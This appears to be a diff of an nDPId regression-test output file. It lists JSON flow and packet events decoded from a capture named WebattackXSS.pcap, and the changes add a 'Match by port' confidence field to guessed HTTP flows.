-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395409,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347395736,"flow_last_seen":1499347395736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347395736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1499347395736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347395736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86QJAAD4G3M2sEAABwKgKMt2iAFAP0mDzAAAAAKACchCFIAAAAgQFtAQCCAoBOonxAAAAAAEDAwc="}
@@ -1384,15 +1384,15 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1499347404575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347404575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA871lAAD4G1nasEAABwKgKMt4AAFBz\/X3KAAAAAKACchD7HQAAAgQFtAQCCAoBOpKTAAAAAAEDAwc="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3639,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1499347404575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347404575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3gCf5c\/zc\/19y6AScSAkNgAAAgQFtAQCCAoD5GQJATqSkwEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1499347404576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347404576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA071pAAD4G1n2sEAABwKgKMt4AAFBz\/X3Ln+XP9IAQAOXDPQAAAQEICgE6kpMD5GQJ"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347405601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347407100,"flow_last_seen":1499347407100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347407100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1499347407100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347407100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oV1AAD4GJHOsEAABwKgKMt4aAFCK7TRXAAAAAKACchArEAAAAgQFtAQCCAoBOpUKAAAAAAEDAwc="}
@@ -1418,16 +1418,16 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1499347414709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347414709,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LQhAAD4GmMisEAABwKgKMt5sAFBxqrFxAAAAAKACchC\/dwAAAgQFtAQCCAoBOpx5AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3724,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1499347414710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347414710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3mzO8Ll1caqxcqAScSDGHAAAAgQFtAQCCAoD5G3vATqceQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3725,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1499347414710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347414710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LQlAAD4GmM+sEAABwKgKMt5sAFBxqrFyzvC5doAQAOVlJAAAAQEICgE6nHkD5G3v"}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
